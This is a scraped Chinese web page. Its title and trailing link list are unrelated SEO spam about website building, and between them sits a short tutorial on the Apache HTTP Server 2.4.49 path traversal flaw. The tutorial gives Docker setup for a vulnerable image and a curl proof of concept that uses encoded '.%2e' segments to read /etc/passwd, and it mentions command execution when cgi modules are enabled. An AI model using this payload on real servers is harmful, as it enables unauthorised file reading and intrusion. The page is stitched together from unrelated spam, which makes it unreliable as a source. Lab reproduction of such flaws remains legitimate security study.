当前位置: 首页 > news >正文

星沙做淘宝店铺网站广西网站建设原创

news 2025/9/18 12:17:44
星沙做淘宝店铺网站,广西网站建设原创,网站建设最新流行,wordpress 后台美化插件Apache HTTP Server 路径穿越漏洞 漏洞简介 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录 <Directory/>Require all granted</Directory>允许被访问的的情况下&#xff08;默认开启&#xff09;&#xff0c;攻击者可利用该路径穿越…

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录 <Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
#启动容器
docker run -d -p 宿主机端口:容器端口 --name 容器名称 镜像的标识|镜像名称[:tag]
漏洞复现

http://ip:8080

image-20240806164423822

使用poc

curl http://ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

image-20240806164934680

http://www.yayakq.cn/news/957409/

相关文章:

  • 杭州高端网站建设排名免插件WordPress对接公众号
  • 有哪些好的网站制作公司河南郑州app建设网站
  • 做跨境电商在什么网站选品网站轮播图居中代码怎么写
  • 做婚纱网站是怎么确认主题12306网站建设 实际
  • 有没有学校需要建设网站中学生网站制作
  • 做参茸产品的网站腾脉网建站
  • 城市宣传网站建设方案下载安装微信
  • 做网站工资多少青岛个人接网站建设
  • 网站建设小结做网站不想用微软雅黑了
  • 网站备案需要关闭服务器网站路径问题
  • 网站后台这么做哪个网站上做自媒体最好
  • 济南网站维护公司南平市建设局网站
  • 如何在网站上做推广北京最新消息情况今天
  • wordpress源码整站个人网站报价
  • 技术支持凯里网站建设泉塘芒果国际影城
  • 网站案例展示网站的整合
  • 网站开发定制公司营销网站制作全包
  • 电机东莞网站建设用page打开wordpress
  • 做网站的皮包公司淄博网站制作网络定制
  • 东乡族网站建设suxing wordpress
  • 梁山网站建设哪家便宜网站seo其应用
  • 天津网站开发网站微商怎样让客源主动加你
  • 信誉好的网站开发wordpress 论坛
  • 小程序开发平台网站推荐黄山自驾游最佳攻略
  • 电商网站设计模板哔哩哔哩h5播放器
  • 聊城做网站优化工程项目信息查询平台
  • html5 企业 网站网站加速服务
  • 网站建设过程中需要注意的通用原则百度做网站怎么样
  • 域名没备案如何建设网站pc网站怎么做自适应
  • 网站建设写程序用什么软件wordpress会员查看发布插件